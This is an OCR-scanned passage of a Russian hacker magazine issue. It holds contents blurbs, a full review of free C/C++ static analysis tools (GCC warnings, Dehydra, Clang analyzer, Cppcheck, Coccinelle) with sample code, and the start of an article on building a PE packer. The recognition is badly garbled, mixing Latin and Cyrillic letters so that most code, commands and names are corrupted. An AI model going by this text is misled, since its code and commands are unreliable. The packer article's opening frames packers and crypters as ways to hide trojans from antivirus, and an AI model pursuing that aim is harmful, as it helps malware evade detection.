Незабывали рассказывать, какМісгозоК 
и Огасіе затаскали крупные компании по 
судамза нарушения каких-тоспорных 
патентов. На фоне этих новостей как-то 
меркнутнастоящие достижения в мире от- 
крытых исходников: новая 3.0 версия ядра 
Ыпих, а также серьезные обновления в бра- 
узерах, Споте и КйЕ, а также популярных 
дистрибутивах. Мы решили рассказатьо 
наиболее важных событиях и даже сделать 
некоторые прогнозы на будущее. Все самое 
важноезагод — водном материале. 




кодинг 



1ШІХОШ 






СТАТИЧЕСКИЕ АНАЛИЗАТОРЫ КОДА 




НОѴѴ-ТО: РЕ-ПАКЕР 




88 


Автоматизируем поиск утечек памяти, 
выходовза границу массива, использова- 


94 


Всетонкости ихитрости разработки 
своего собственного упаковщика испол- 


110 



ния неинициализированных переменных няемых файлов формата РЕ. А это уже без 

идругихошибок. пяти минуткриптор! 



КРИПТОЛОГИЧЕСКИЙ РАЙ 

Два десятка хардкорных трюков по 
нестандартному использованию 
привычных 0реп55І_ и ОрепББН, которые 
никогда не приходилитебе в голову. 



БУИХАСК 



РЕЛКОМ 




122 



РОЖДЕННЫЙ ПОД ЦИФРОЙ ВОСЕМЬ 

Название ѴѴіпсІоѵѵзБегѵег 8 является 
кодовым и еще не утверждено оконча- 
тельно. Но попробовать новую серверную 
ОСотМБмы можем уже сейчас. 



126 



ДОСПЕХИ ДЛЯ ІТ-ИНФРАСТРУКТУРЫ 

Что могути чего не могу Ю5/ІР5? 
Тест-драйв 5 наиболее популярных 
систем предупреждения вторжений от 
известныхвендоров. 



132 



Я ТВОЙ БАМУ ВКІОѲЕ ТРУБА ШАТАЛ 

Стоитли покупать материнскую плату 
на базе нового ч и псета АМй А75? Ищем 
ответ на этот вопрос, тестируя 6 разных 
материнок. 
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ѴАІКАЛЮ ЗіІѴЕЙЗТСШЕ МанОЙѴ С АКТ НАС Р ѴЫ.ЕІ4СІА МАХ ВПООКІАМОЗ ЗТО№ 



миСіи.О-НѴРЕК ЗК.ѴЕК 



ЙІѴЛОЬ ■ СЮ58 ВІ.АСК МИЛЕ О 6 РОКЕ 6 




ІМІ1Ѵ А ПО ЛІАНОО КЕРАМС 201. ПЕН С АОѴѴЕІЬ ШІЧОЙІЫА ПАНАМА КМЕПЕНШИ 




ЧОТАНѴ ГОПСЕР ѴѴНЕЕІ.З НИКВСКСЧІЧС ВР ІАІТЕЧІЛООВКЕ РОМНСТОМ ѴѴ1Ц.0ѴѴ 5ТКІР 



ѴіаиН аиг жоЬдііе Іо ѵіс^ Же сотрісіе 1>пе аі Т5ѴУ ѴѴЬссІа 



ТЗѴѴ іі СІеіІіСаЕесІ ІО Ьеігід ІІТе ѵѵогігі'ь ргетшт ршѵкіег оі йіаддегесі 
шЬееІ арріісайопз ап б Над тоге опе-ріѳее зіаддегесі ъѵМееІ зігез 
{Нэп апу оіИег ѵѵіпееі ЬгапсІ іп іНе ѵѵогЙ, 





кодинг 



Дима Осмаков (ЬитзНтуакйуапсІех.ги) 




ОБЗОР БЕСПЛАТНЫХ 
ИНСТРУМЕНТОВ 
ДЛЯ СТАТИЧЕСКОГО 
АНАЛИЗА КОДА 
НА С/С++ 




УШИ 

— СПИСОК 

инструментов 
для статического 
анализа. 

— опции 
ССС, связанные 
с предупреждениями. 

— опции 

ССС, специфичные 
для предупреждений, 
выдаваемых при 
проверке кода на С++. 

Ьіиѵ/иР9ѵѵОВ 

— синтаксис 
расширения для 
атрибутов в ССС. 

— 

плагины для ССС. 

т2І.Іа/РѴШ4 — 

РеИусіга. 

— СІапд 
ЗІаІісАпаІугег. 

— 

СррсЬеск. 

ЫЩіІЗууХР — 

СоссіпеІІе. 

Шр://т2І.1а/ІЕѵХС[. 

— РХК. 



в программах на С/С+-» 



Основные вопросы, обсуждаемые в статье, 
касаются хороших бесплатных инструментов 
для поиска логических ошибок методами 
статического анализа в коде на С/С++ и их 
функциональным возможностям. 

При статическом анализе информация о программе извлекается 
из её исходного кода. Извлечение происходит автоматически с по- 
мощью специального инструмента — статического анализатора, 
сама программа не запускается. Нас может интересовать самая 
разная информация. Содержит ли программа логические ошибки? 
Будет ли программа правильно решать поставленную перед ней 
задачу для всех возможных входных данных? Удовлетворяет ли 
поведение программы формальной спецификации? Помимо во- 
просов, связанных с корректностью работы программы, могут воз- 
никать вопросы, касающиеся непосредственно ее исходного кода. 
Удовлетворяет ли код требованиям по стилю? Содержитли код 
конструкции, которые считаются небезопасными и потенциально 
могут привести к ошибкам? Также к статическим анализаторам 
можно отнести программы, которые визуализируют структуру кода 
и помогают проводить рефакторинг. 

Эта статья в основном посвящена инструментам, которые по- 
могают искать логические ошибки в исходном коде, написанном 
на С/С++. Таких инструментов достаточно много, поэтому пришлось 
провести жесткий отбор. Во-первых, я сразу отбросил платные 
инструменты (Соѵегііу, РоІуБрасе, РѴБ-5іисІіо, МісгозоЙ \апаІуге 
Над и многие другие). Во-вторых, исключил устаревшие, то есть 
такие, для которых больше года не выпускалось обновлений. 

Из оставшихся я выбрал наиболее, на мой взгляд, практичные: 
ССС, РеИусІга, СІапд зіаііс апаіугег, СррсЬеск и СоссіпеІІе. 



6СС 

В качестве первого шага при выявлении логических ошибок 
целесообразно провести компиляцию при максимальном уровне 
предупреждений. На странице приведены опции 

ССС, отвечающие за них. Рассмотрим некоторые из этих опций. 

-ѴѴаІІ включает множество предупреждений об инструкциях, 
которые, скорее всего, содержат легко исправляемые ошибки. 

Сюда относятся различные ошибки форматной строки (-ѴОТогтаі): 

Ілі-Роптаі: ( ) { 

х = 1 ; 

// Неправильный тип второго аргумента 
ргіп1:-р( ’^сІХп" , х); 

5 [ ] = ’^сІХп"; 

// Опасно использовать неконстантную форматную строку 
ргіп-Щз, х); 

} 

Ошибки выхода за границу массива (-ѴѴаггау-ЬоипсІБ, работает 
только вместе с -02, причем исключительно в простейших случаях): 

1:е5І:_ЬоипсІ5[1Ѳ] ; 

ІлІаггау_ЬоипсІ5() { 

і:е5І:_ЬоипсІ5 [ 10 ] ; 

} 

Атакже ошибки использования неинициализированной пере- 
менной (-ѴѴипіпіІіаІігесІ) и многие другие. 

-ѴѴехІга включает дополнительный набор предупреждений. 

В него входят, например, предупреждения об ошибках, возникаю- 
щих при сравнении значений знаковых и беззнаковых типов и не- 
явном преобразовании знакового в беззнаковый (-ѴѴзідп-сотраге): 
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ІлІзі§п_сотраге() { 
х = -1; 

У = 3 ; 

і* (х > У ) 

1; и_ выполнится эта ветка 

еізе 

0 ; 

ь_ 

Многие полезные предупреждения не входят в -ѴѴаІІ или -ѴѴехІга, 
и их нужно подключать отдельно: 

• -ѴѴсопѵегзіоп предупреждаете приведении типов, при котором 
значение может поменяться (например, преобразование боиЫе 
в іпі или іпі в ипзідпеб іпі). 

• -ѴѴса5І_яиаІ предупреждаетотаком приведении типа дляуказа- 
теля, при котором специфическая информация отипетеряется, 
например: 

ІлІсаз1:_диа1() { 

* 5 = "сопз'ЬапІ: з-ргіп^"; 

(( *) б) [ 0] = ' п ' ; 

і 

В итоге для проверки программ на С я остановился на следую- 
щем наборе опций: 

-02 -Іліаіі -Ыех-Ега -Ы-Рогта1:=2 -Ыіпііі-зеі-р -Ыаггау-Ьоипбз 
-Ыбіѵ-Ьѵ-гего -ЫЯоаІі-едиаІ -Ыипбе-Р -ЫзЬабом -Ысазіі-диаі 
-ІлІсопѵегБІоп -Іліетрііу-Ьосіу -1лІа§§ге§а1;е-ге1;игп 
-ІлІипгеасЬаЬІе-собе 

На странице собраны опции, специфичные для 

С++. Рассмотрим несколько наиболее интересных: 

• -ѴѴеНс++ предупреждаете нарушении ряда рекомендаций 
из книгСкотта Мейерса «ЕРРесйѵе С++» и «Моге Е^есііѵе С++». 
Например, кним относятся предупреждения о виртуальных 
деструкторах для базовых классов (эти предупреждения можно 
включить отдельно, ка к -ѴѴпоп-ѵігІиаІ-сІІог), а также об опреде- 
лении копирующего конструктора и оператора присваивания для 
классов с членами-указателями. 

• ѴѴ-оІсІ-зІуІе-сазІ предупреждаете при ведении типов в стиле 
С (через скобки). В С++, какты знаешь, принято использовать 
бупатіс_са5І, 51аЬс_саз1, гет1егрге1_саз1 или соп5І_сазС 

В итоге для проверки программ на С++ я добавил следующие опции: 

-ІлІсЕог-бІіог-ргіѵасу -Ые-Р-Рс++ -Ыоіб-зііуіе-сазі: 
-ІлІоѵег1оабеб-ѵіг1:иа1 

В ВСС есть расширение, которое позволяет задавать дополни- 
тельные атрибуты для функций, переменных и типов ( ). 

Благодаря этим атрибутам компилятор может эффективнее оптими- 
зировать и проверять код. Рассмотрим несколько примеров. 

Можно пометить функцию (а также переменную или тип) 
атрибутом бергесаіеб. Тогда при использовании этой функции 
компилятор выдаст соответствующие предупреждение. Синтаксис 
имеет следующий вид: 

5яг( х) аІ^гіЬиІіе (( )); 

Другой полезный атрибут — поппиІІ. Он требует, чтобы опреде- 
лённые параметры функции были ненулевыми. Например, при 
объявлении 

ехТ егг ѵо * 

ту_тетсру (ѵоі *без1:, сопбі: ѵоі( *бгс^ Іеп) 

а1=1:гіЬи1:е ((поппиІІ (1. 2))); 



компилятор проверит, являются ли первые два аргумента во всех 
вызовах ту_тетсру ненулевыми. Следует отметить, что он выдает 
предупреждение только в том случае, если параметр функции 
непосредственно представляет собой N1111. Следующий код уже 
не вызовет нареканий (хотя хотелось бы): 

* безѣ = І\ІІЛ_І_; 

* б гс = І\ШІ_І_; 
ту_тетсру(без1:., зге, 10); 



ОЕНУйРА 

Начиная с версии 4.5, ОСС поддерживает АРІ для написания 
плагинов, которые работают с внутренним представлением кода. 

На странице приведен список существующих плагинов. 

Для нас наиболее интересен плагин йеЬубга, предназначенный 
для статического анализа кода на С++. БеЬубга, используемый для 
проверки продуктов МогіІІа, по сути, предоставляет простой способ 
вклиниться в процесс компиляции С++. Для этого нужно заполнить 
набор функций (хендлеров) на баѵаБсірІ, которые будут вызываться 
по мере компиляции. БеЬубга предоставляет три основных хендлера: 

• ргосезз_1:уре(1:уре) — вызываетсядля каждогоопределениятипа, 
в качестве параметра Іуре передается полная информация о типе. 

• ргосезз_-РипсРіоп(бес1, Ьобу) — вызывается для каждого 
определения функции (бесі описываеттип функции и её пара- 
метры, Ьобу представляет собой массив описаний инструкций, 
составляющих тел о функции). 

• ргосе55_бес1(бес1) — вызывается при определении глобальной 
переменной, функции или шаблона. 

Рассмотрим на примерах работу с БеЬубга. Допустим, мы хотим 
построить граф вызовов функций в нашей программе, другими 
словами, хотим понять, какие функции может вызывать каждая 
функция. Для этого напишем простой 65-скрипт саІІдгарЬдз: 

-РипсЕіоп ргіп1:_а11_-Рса1І5(ѵагоЬд5) { 

-Рог еасЬ (Іеі оЬі іп ѵагоЬіз) { 

(оЬд . ізРсаІІ) 
ргіп-ЬС' " + оЬд.пате) 

(оЬд .аззі§п) // ГІ§Ь1: _зібе о-р аз зі^ п 
ргіп1:_а11_-Рса1І5(оЬд .а5зі§п) 

-р (оЬд . аг^итепііз) // аг^итепііз о-Р -Рсаіі 
ргіпІі аІІ -РсаІІзРоЬд . аг^итепііз) 

} 

} 

ргосезз_-Рипс1:іоп(бес1, Ьобу) { 
ргіп1:(бес1. пате + " :") 

>г еасЬ (Іеі Ь іп Ьобу) ргіпі: аіі -РсаІІзРЬ. зііаііетепііз) 

} 

После обработки очередной функции компилятор каждый раз 
будет вызывать ргосезз^ипсЬоп, в которой мы печатаем имя функ- 
ции, а затем рекурсивно печатаем все вызовы других функций. 
Скрипт имеет ряд недостатков (например, если какая-нибудь функ- 
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Отчет, созданный зсап-ЬиіІсі 

ция вызывает другую функцию несколько раз, то будут напечатаны 
все вызовы], но для ознакомительных целей сойдет. 

Проверим работу скрипта на файле ѵѵогкапсізоіѵе.сс: 

ыогк( сіаіа); 

50Іѵе( сіаіса ) ; 

ыогк( сіаіа) { 

гез = зо1ѵе(сІа1:а) ; 
гез; 

} 

зо1ѵе( сіаіа) { 

гез = могк(сІа1:а) ; 
гез; 

ь_ 

іпі шаіпП { 
зо1ѵе(10); 

0 ; 

ь_ 

Запускаем йеЬусІга: 

§++ --Рр1и§іп=~/с1е1іус1га/§сс_с1е1іус1га . зо --Рр1и§іп-аг§-§сс_\ 
сІеІіусІга-5сгір1:=са11§гарІі . дз ыогкапсізоіѵе. сс -о /сіеѵ/пиіі 

Получаем на выходе: 

ыогк(і піі) : 
зоіѵе(іпіі) 
зо1ѵе(іп1:) : 
ыогк(іп1:) 
таіп() : 
зо1ѵе(іп1:) 
ыогк(іп1:) 

Полное описание функций-хендлеров и их параметров, а также 
примеры использования можно найти на странице проекта: 

РѴѴЬЦ . 

йеЬусІга «из коробки» умеет достаточно мало. Она в основном 
предназначена для написания собственных процедур проверки. 

В репозитории тогіііа-сепігаі ( ] лежит несколько готовых 

скриптов, использовавшихся для проверки кода программ от МогіІІа, 
но они не очень интересные, так кактребуют дополнительной анно- 
тации кода. Например, скрипт Япаідз проверяет, нетли наследников 
у класса, помеченного пользовательским атрибутом ЛпаІ. 

В общем, это очень интересный инструмент, но он требует до- 
полнительного программирования. 




Поисковая строка ОХР 



СЬАЫб 5ТАТІС АЫАЬУ^ЕР 

СІапд — это компилятор С/С++/ОЬ]есІіѵе-С, который являются частью 
проекта І_І_ѴМ( ). В СІапд встроен статический анализатор, для 

запуска которого нужно передать утилите СІапд (или сІапд++) опцию 
--апаіуге. На его сайте ( ) опубликован список проверок, 

которые выполняются в ходе анализа. Проверки разделены на не- 
сколько групп: соге, сіеабсосіе, озх, ипіх. Примерно половина прихо- 
дится на соге — сюда входят проверки на наличие базовых ошибок, во 
многом схожие с предупреждениями в ОСС: 

• деление на ноль; 

• разыменование нулевогоуказателя; 

• использование неинициализированных переменных в различных 
ситуациях; 

• проверки, специфичные для ОЬ]есІіѵе-С. 

Другая большая группа — озх, где собраны проверки для Мае 05 X. 
Вообще, видно, что именно эта среда является целевой для разработ- 
чиков СІапд зіаііс апаіугег. Рассмотрим работу СІапд апаіугег на приме- 
ре. Пусть у нас есть код сіапіезі.с: 

#іпс!ис1е <з1:сІіо. Ь> 
сІіѵ_Ьу_ 2 его() { 
х = 0; 
у = 5 / х; 

еіигт у; 

іпі: пиІІ сІеге-РегепсеО { 
х = 0; 

* р = і\ІІЛ_і__і 
(х > 0) 

Р = &х; 

*р; 

ь_ 

іпі шаіпП { 

0; 

} 

Компилируем и одновременно проверяем код: 
с!ап§ --апаіѵге сІап^ез'Ь.с -о с1ап§1:е5І: 

Получаем на выходе: 

сіап^іезі: . с : 5 : 13 : ыагпіп§: Ріѵізіоп Ьу іего 
іпі: у = 5 / х; 
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с1ап§1:е5І:.с:15:1Ѳ: ыагпіп§: йеге-Регепсе о-р пиіі роіпііег... 
ге1:игп *р; 



2 шгпіп%5 ^епегаѣесі. 

Если заменить «х > 0» на «х >= 0» в функции пиІІ сІегеРегепсе, то 
второе предупреждение, что приятно, исчезнет. 

Вместе с сіапд поставляется удобная утилита зсап-ЬиіІсІ, ко- 
торая позволяет проводить статический анализ всего проекта во 
время его сборки. Этой утилите нужно передать команду, кото- 
рая начинает процесс сборки проекта. Она заменит все вызовы 
компилятора вызовами со статическим анализатором. Утилита 
не выполняет сложный анализ процесса сборки, а просто заменяет 
переменные окружения СС и СХХ своим анализатором, что несколь- 
ко ограничивает применение утилиты. 

Для рассмотренного в качестве примера сіапдіезі.с можно 
сделать такой Макете: 

с1ап§1:е5І: : с1ап§1:е5І: . с 



$(СО -о сіап^езі: с!ап|9гЕе5І:.с 

Теперь можно запустить зсап-ЬиіІсІ таке. Будет создан отчет, 
который можно просмотреть с помощью утилиты зсап-ѵіеѵѵ. 

На основе Сіапд создано ещё несколько интересных проектов, 
например проект ОХР, который представляет собой интеллек- 
туальный браузер исходного кода. ОХР позволяет удобно искать 
различные конструкции в коде. Например, с его помощью можно 
найти все функции, которые вызывают заданную функцию, или все 
типы, которые являются потомками заданного типа. Насколько я 
понял, раньше ОХР работал на основе йебусіга. Как настроить ОХР 
для своего проекта, описано на странице 

СРРСНЕСК 

СррсЬеск — это специализированная программа для поиска оши- 
бок в коде на С++. СррсЬеск работает с кодом как с последователь- 
ностью строк, особо не вдаваясь в их смысл. Сначала он всячески 
упрощает код и приводит его к виду последовательности токенов, 
разделенных пробелами. После этого он ищет типичные ошибки 
с помощью регулярных выражений и набора эвристических пра- 
вил, написанных на С++. 

Вот так выглядит простейшие правило для поиска ошибок 
деления на нуль: 

сррсбеск --ги1е="/ 0" 

То же самое правило на С++: 

СбескОѣбег : :біѵІ5ІопВу2его() { 

// І-оор аіі Ііокепз 

( Токеп *1:ок = _1:окепІ2ег->1:океп5(); 

Ток; Ток = Ток->пехТ()) { 

// сбе ск ІТ Т б еге іб а сііѵізіоп Ьѵ гего 
-р (Токеп: :МаТсб(Ток. 11 / 0' 1 )) { 

// герогТ еггог 

сІіѵІ5ІопВу2егоЕпгог(Ток) ; 

} 

} 

ь_ 

Для Сррсбескуже написано огромное количество правил. 

На странице проекта перечислены типы детектируемых ошибок: 

• различные сценарииутечки памяти и других ресурсов; 

• использование устаревших функций; 

• неправильноеиспользование5ТІ_и Воозі; 

• наличие неиспользуемых или неинициализированных перемен- 
ных; 



• разыменование нулевогоуказателя; 

• неправильное использование классов; 

• ит.д. 

Сррсбеск имеет как консольный, так и графический интер- 
фейс. Пользоваться и тем и другим одинаково просто — доста- 
точно указать директорию, которую нужно проверить. Разберём 
пример с утечкой памяти: пусть она выделяется в конструкторе, 
но не освобождается в деструкторе. 

ЫеыЬіе { 

риЬІіс : 

ЫеыЬіе() { 

гезоигсе = [256]; 

} 

ргіѵаііе: 

* гезоигсе; 

}; 

таіп() { 

МеыЬіе пооЬ; 

геііигп 0; 

ь_ 

Успешное обнаружение утечки в этой программе с помощью 
Сррсбеск проиллюстрировано на скрине на следующем развороте.! 

Страница содержит внушительный список извест- 

ных и не очень проектов, в которых с помощью Сррсбеск удалось 
обнаружить баги. Что интересно, в основном это баги, найденные 
в коде на чистом С. Подавляющее большинство из них связано 
с утечкой памяти или какого-либо другого ресурса. 

СОСШЕНЕ 

СоссіпеІІе (произносится как [кОксэнэл]) — это инструмент для 
автоматического преобразования С-кода. Преобразования опи- 
сываются в виде семантического патча на языке 5тРІ_ (Бетапііс 
Раісб І_апдиаде). По сути, такой патч — это набор правил для за- 
мены одних конструкций языка С другими. Изначально соссіпеІІе 
разрабатывался для решения следующей задачи. Представь, что 
у нас есть библиотека и клиентский код, который эту библиотеку 
использует. Как нужно изменить клиентский код при изменении 
интерфейса библиотеки? СоссіпеІІе позволяет записать необходи- 
мые изменения в виде компактного семантического патча. Потом 
этот патч можно наложить на клиентский код, чтобы получить 
его актуальную версию. Так как соссіпеІІе «понимает» С, то этот 
инструмент можно использовать для поиска определённых шабло- 
нов в коде. Нас интересуют шаблоны, потенциально содержащие 
ошибку. Для того чтобы понять, как искать шаблоны, рассмотрим 
структуру семантического патча. 

Патч состоит из набора правил следующего вида: 

@[имя параметры]^ 
объявление метапеременных 
@@ 

описание преобразований 

Каждое правило начинается с заголовка, заключённого в два 
значка (3. Заголовок может быть пустым или содержать имя пра- 
вила и какие-либо параметры для него (например, список других 
правил, от выполнения которых оно зависит). За ним следует 
раздел объявления метапеременных. Каждая метапеременная 
представляет собой типизированный шаблон для сопоставления 
с конструкциями в С. Далее идёт основной раздел, в котором 
указывается, какие конструкции нужно найти и на что их следует 
заменить (можно просто искать определенные конструкции, не за- 
меняя их). Рассмотрим несколько примеров. 

Первый пример, касающийся так называемой проблемы 
«!х & у», очень популярен в статьях и презентациях разработчиков 
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соссіпеііе. Предположим, у нас есть переменная Ладз, которая 
хранит набор битовых флажков. Для проверки того, все ли флажки 
установлены, обычно пишут: 

! (Яа%Б & 

Часто скобки забывают ставить, в результате чего получается 
следующий код: 

!Ла§5 & ІІСІ_У_РІ_АС 

При этом ІЛадз — это либо нуль, либо единица, то есть, скорее 
всего, не то, что мы хотели. Семантический патч, который исправ- 
ляет такой код, выглядит следующим образом: 

поіапсі.соссі 

@по1:апсІ@ 
ехргеББІоп Е; 
сопБѣапІ: С; 

@@ 

- !Е & С 

+ !(Е & С) 

Здесь мы определяем правило, которое называется поіапсі. Мы 
говорим, что у нас есть переменная Е, которая может быть сопостав- 
лена произвольному выражению, и переменная С, которая может быть 
сопоставлена константе. Потом идёт код, задающий само преобразо- 
вание, то есть добавляющий скобки во все выражения вида «!Е & С». 
Для теста используем такой код: 

поіапсі.с 

Ііеі_Ѵ_РІ_А6 = 0x2; 
таіп() { 

Яа§5 = ІІСІ_Ѵ_РІ_АС; 

(!Ла§5 & ІІСІ_Ѵ_РІ_АС) 

1; 

0 ; 

} 

Соссіпеііе также предоставляет утилиту БраІсЬ, которая при- 
меняет семантический патч к набору С-файлов. В случае если 
правило совпадает с реальным кодом на С, зраІсЬ на выдаеттради- 
ционный построчный сШ, устанавливающий преобразование. 

В нашем случае зракЬ нужно запускать так: 

5 раІісИ -5р_б1е поіапсі . соссі поіапсі.с 

На выходе получаем: 

НАШНІЧС: поііапсі . с 
сіі-Р-Р = 

— поііапсі. с 

+++ /Іітр/соссі-оиІіриІі-3029-а-Рбб-Ра-поІіапсІ.с 
@@ - 2,7 + 2,7 @@ 
іпіі таіп() { 



іпіі Ла§Б = 11С1_У_Р1_Ае; 

— і-Р ( ! Ла§5 & иСІ_Ѵ_РІ_А6) 

+ і-Р (!(Яае5 & Ц(эІУ_Г1-АСз) ) 
геііиг п 1; 
еІБе 

геііигп 0; 

Опция -сіігутилиты зраІсЬ предназначена для рекурсивной про- 
верки всех С-файлов в заданной директории. 

Оказывается, ошибка «!х & у» встречается довольно часто. 

На странице собраны исправления, сделанные 

с помощью соссіпеііе в исходных кодах Ьі п их. Так вот, 20 из этих 
исправлений связаны как раз с ошибкой «!х & у»! В качестве 
примера приведем один из отрывков кода, где она содержится 
( ): 

— а/с!гіѵег5/5егіа1/т32г біо.с 
+++ Ь/сІгіѵег5/5егіа1/т32г_5Іо. с 

@@ -421., 7 +421., 7 @@ Бііаіііс ѵоісі 1ігап5ті1і_сІіаг5( 

Біігисіі иаг1і_5Іо_рог1і *ир) 
ыбііе ( І5егіа1_іп(ир, УАКТ_І_5К) & ІІАКТ_І_5К_ТНКЕ) ; 

+ мііііе ( ! (5егіа1_іп(ир. ЦАКТ_І.5К) & ЦАКТ_І.5К_ТНКЕ > ) ); 

} ы РііІе (--сои пі > 0^) ; 

Ещё одна достаточно популярная ошибка в коде І_іпих связана 
с тем, что функции тетзе* вместо размера структуры передается 
размер указателя на эту структуру. Патч для нахождения и исправ- 
ления такой ошибки выглядит следующим образом: 

@@ 

Туре Т; 

Т *х; 

ехргеББІоп Е; 

(а)(а> 

тетБеТГх. Е. 5І2ео-Р( 

+ * 

х)) 

Здесь мы описываем, что у нас есть указатель х на тип Т и про- 
извольное выражение Е. Далее мы ищем все вызовы тетзе*, 
где в качестве третьего параметра выступает размер указателя, 
и добавляем *, чтобы разыменовать указатель и получить размер Т. 
Результат применения семантического патча к коду І_іпих опреде- 
лённой версии (Ь ' ): 

— а/сІгіѵег5/5Ііа§іп§/ы1ап-п§/ргІ5т2-Ры. с 
+++ Ь/с1гіѵег5/5Ііа§іп§/м1ап-п§/ргІ5т2-Рѵу/. с 

@@ -439.,7 +439.,7 @@ ѵоісі -Ргее_сІіипк5 (іт§сІіипк_1і *-РсІпипк., 

ип5І§песІ іпіі *п-РсІіипк5) 

} 

} 

*п-РсІіипк5 = 0; 

• тет5е1і(-РсІіипк. 0. БІгео-РГ-РсІіипк^П ; 

± шет5е1і(-РсІіипк. 0. БІгео-Р^-РсРшпИ ); 

} 

Перейдем к другим возможностям языка 5тРІ_ и напишем 
патч, который будет в первом приближении (очень грубом) 
отыскивать ошибки утечки памяти. Будем отслеживать такую 
ситуацию. Пусть функция типа таііос выделяет память, которая 
сохраняется в переменной-указателе. Дальше идет стандартная 
проверка, что указатель не равен нулю (память успешно выде- 
лена). Потом идет какой-нибудь хитрый код, который реализу- 
ет логику, не связанную с нашим указателем. Этот код может 
описывать разные процедуры проверки, приводящие к выходу 
из функции. Память при этом освободить забывают, в результате 
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Ищем ошибки в программах на С/С++ 



чего получается утечка. В коде Ыпих насчитывалось 13 ошибок 
такого типа ( ). Патч, устраняющий ошибку утечки 

памяти: 

@1еак@ 

1=УРе Т; 

Т* х; 

зііаііетепіі 5; 

ісіепіііііег а=~» . *а11ос$»; 

Ш 

* х = а( . . . ) ; 

і-р (х == І\ІІЛ_І_) 5 
. . . ыбеп ! = х 

* геііигп . . . ; 

В разделе описания переменных, кроме всего прочего, задается 
переменная а, которая успешно сопоставляется с любым иден- 
тификатором, оканчивающимся на аііос. Мы можем использовать 
регулярные выражения, чтобы конкретизировать вид конструкций, 
которые мы хотим найти. 

Разберём подробнее раздел, задающий преобразования кода. 

* х = а(. . 

Раньше мы использовали «+» и « », чтобы указать, какие эле- 
менты нужно добавить или удалить. Символ «*» используется для 
поиска. Многоточие сопоставляется произвольному коду. Если код 
должен удовлетворять ряду ограничений, то следует воспользо- 
ваться ключевым словом ѵѵЬеп: 

. . . мбеп ! = х 

Здесь мы говорим, что хотим любой код, в котором не содержит- 
ся х (при этом видх определяется ранее). 

После применения патча ктестовому коду получаем следующий 
Ш. 

сіі-Р-Р = 

— Іеак.с 

+++ /1ітр/соссі-ои1іри1:-11б39-4с4ѲсІ5-1еак.с 
@@ - 2,12 + 2,10 @@ 
ігѵЕ таіп(іпіі аг%с. сбаг** аг§ѵ) { 
сбаг* рагат; 
рагат = та11ос(257); 
і-р (рагат == І\ІІЛ_І_) { 
геііигп 1; 

} 

і-р (агес < 2) { 
геііигп 1; 

} 

П ... изіп§ рагат 
-Ргее(рагат); 
геііигп 0; 

ь_ 

Минусы здесь служат только для выделения участков кода, кото- 
рые нас интересовали в патче (там мы отмечали их символом «*»). 

5тРІ_ имеет много других интересных возможностей, напри- 
мер, позволяет задавать зависимости между правилами (применяй 
такое-то правило, только если выполнено такое-то), обеспечивает 
интеграцию с Руібоп и т. д. Более подробно о них можно узнать 
на официальном сайте соссіпеііе ( ). 

Также на основе соссіпеііе создано несколько других программ. 

* Соссісбеск содержит набор готовых правил, которые ищут сле- 
дующие популярные ошибки: 

• разыменование нулевогоуказателя; 

• сравнение указателя с нулем вместо N11 И; 
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Результат работы СррсИеск 

• 5І2еоі(роіпі:ег); 

• ! х & у ; 

• утечки памяти; 

• неиспользуемые переменные. 

Достаточно натравить соссісЬеск на интересующий тебя проект, 
и он проверит его на вышеперечисленные ошибки (вернее, 
на шаблоны в коде, которые на них очень похожи). СоссісЬеск 
лежит в директории зсгірЫ проекта соссіпеііе. 

• Негосіоіоз ( ) позволяет проследить эволюцию 

ошибок в нескольких версиях программы. При этом он собирает 
интересную статистику и может строить графики. 

• Соссідгер ( ) — это «семантический дгер» для С. Он 

может искать в программе заданные структуры или переменные 
(как и ОХР). 

• БрсІіН ( ) — это «семантический сіііі», то есть инстру- 

мент для автоматического выявления изменений в программе. 
Звучит очень круто, но работает он только в лабораторных 
условиях. 

Соссіпеііе переводится с французского как «божья коровка» 

(Ьид Ібаі еаіз апоібег Ьидз). Документация на «коровку» довольна 
разрозненная, поэтому, чтобы понять, как писать на 5тРІ_, при- 
дется пройти небольшой квест. Но оно того стоит. В пользу этого 
говорит хотя бы количество багов, найденных в коде Ыпих (судя 
по , оно достигает нескольких сотен). 

ЗАКЛЮЧЕНИЕ 

Итак, каковы общие рекомендации по поиску ошибок с помощью 
инструментов для статического анализа? Первым делом проверь 
свой код при максимальном уровне предупреждений компилятора 
(то есть указывай не только -ѴѴаІІ). По возможности лучше ис- 
пользовать для проверки несколько компиляторов (например, іпіеі, 
сіапд). Далее всё зависит от языка. Если это С++, то выбор бесплат- 
ных инструментов достаточно ограничен (С++ тяжело разбирать; 
вероятно, ситуацию улучшит возможность писать плагины для 
6СС). Определенно стоит попробовать Сррсбеск, который особенно 
хорошо находитутечки памяти. Для С++ также есть Оебусіга, но для 
нее, скорее всего, придется писать проверки самостоятельно. Для 
чистого С ситуация получше. Есть отличный инструмент Соссіпеііе, 
есть Ргата-С. Они умеют находить определенные типы утечек 
памяти, выходов за границу и прочие ужасы. Однако для поиска 
нетривиальных ошибок недостаточно просто натравить на код эти 
инструменты (как и большинство других продвинутых программ 
для статического анализа). Нужно либо писать свои проверки, 
либо специальным образом настраивать сам анализатор. 

С другой стороны, опыт статического анализа показывает, 
что наиболее часто встречаются именно тривиальные ошибки, 
которые успешно отлавливают инструменты статического анализа 
«из коробки». Поэтому проверить свой код статическим анализато- 
ром — это хорошая идея. И-И 
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РеІегапсЙЬе ѴѴоК 




ты-то : 

РЕ-пакер 

РАЗРАБАТЫВАЕМ 
СВОЙ УПАКОВЩИК 
ИСПОЛНЯЕМЫХ ^ 

ФАЙЛОВ 



Мы с Волком давно заметили, что разработка 
РЕ-пакеров, крипторов и навесных защит — 
это почему-то удел немногих. Самого разного 
рода троянов в инете целая куча, а софта 
для упаковки и скрытия от антивирусов кот 
наплакал. При том, что код-то там несложный, 
просто сорцов в паблике, от которых можно 
было бы отталкиваться при разработке своего 
стаффа, как-то не наблюдается. Мы решили 
исправить эту досадную ситуацию. Сейчас 
мы расскажем, как написать свой несложный 
упаковщик исполняемых файлов и научить его 
паре дерзких приемов. 



ГИ1 


ІШП 


Исходный КОДИ 


После выполнения 


бинарники кэтой 


функции 


статье ищи на нашем 


ІоасІЕхесиіаЫе 


омо. 


в загрузчике 
неплохо было бы 




освободить память, 
выделенную для 
распаковки, — она 
нам больше не 




пригодится. 


іН у 




авным-давном, когда ѴѴіпсІоѵѵв ХР еще не было, в поисках 
информации о пакерах мы с Волком забирались в самые 
дебри исходников тогда еще молодого ІІРХ. Но то ли аце- 




тилхолина у нас в мозгах синтезировалось меньше нужного, то ли 
